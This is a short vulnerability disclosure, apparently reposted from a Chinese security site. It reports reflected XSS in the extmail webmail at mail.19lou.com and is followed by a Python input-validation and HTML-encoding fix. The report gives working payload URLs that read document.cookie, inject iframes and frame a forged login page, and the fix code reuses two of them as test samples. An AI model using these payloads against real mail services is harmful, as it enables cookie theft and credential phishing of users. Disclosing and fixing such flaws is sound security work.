Source: 自学PHP网 Time: 2015-04-17 11:59
1. Cross-site scripting (XSS)
2. Forged login box
Mail system:
https://mail.19lou.com/extmail/cgi/index.cgi
extmail has several reflected XSS issues:
https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&error=badlogi
https://mail.19lou.com//extman/cgi/signup.cgi?domain=%3Cscript%3Ealert%28document.cookie%29%3C/script%3
....
Loading an iframe
https://mail.19lou.com//extman/cgi/signup.cgi?domain=%3Ciframe%20src=%22http://wooyun.org%22%20width=%22500%22%20height=%22180%22%3E&error=badlogi
(image omitted)
Forged login box
https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%22%3E%3Ciframe%20src=%22http://127.0.0.1/false.htm%22%20width=%22800%22%20height=%22980%22%20frameborder=0%20%3E%20&error=badlogi
The forgery looks fairly convincing:
The externally loaded false.htm
Contents of false.htm
Fix:
The version seems to be somewhat old.
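Besides upgrading, the reflected `__mode` and `domain` values need to be validated on input and HTML-encoded on output. The following is an added example, not part of the original report and not extmail's own code: it runs two of the request URLs quoted above through an allowlist check and shows the encoded form that would render as inert text. The allowlist patterns, the function names and the benign sample URL are assumptions.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Assumed allowlists for the two reflected parameters (hypothetical patterns,
# not taken from extmail's source; tighten them to the values the app accepts).
VALIDATORS = {
    "__mode": re.compile(r"[A-Za-z0-9_]{1,32}"),
    "domain": re.compile(r"[A-Za-z0-9.-]{1,253}"),
}

def render_reflected(value):
    """HTML-encode a request value before it is written into the response."""
    return html.escape(value, quote=True)

def check_request(url):
    """Return (param, encoded_value) for each parameter failing its allowlist."""
    findings = []
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in params.items():
        rule = VALIDATORS.get(name)
        if rule is None:
            continue  # no rule: still encode it with render_reflected() on output
        for value in values:
            if not rule.fullmatch(value):
                findings.append((name, render_reflected(value)))
    return findings

# Two request URLs quoted in the report above, plus one constructed benign request.
SAMPLES = [
    "https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&error=badlogi",
    "https://mail.19lou.com//extman/cgi/signup.cgi?domain=%3Ciframe%20src=%22http://wooyun.org%22%20width=%22500%22%20height=%22180%22%3E&error=badlogi",
    "https://mail.19lou.com/extman/cgi/signup.cgi?domain=example.com",  # constructed
]

if __name__ == "__main__":
    for url in SAMPLES:
        for name, encoded in check_request(url):
            print(f"reject {name}; encoded form: {encoded}")
```

Parameters without a rule (such as `error`) are not rejected here, so they must still pass through `render_reflected()` wherever the page echoes them.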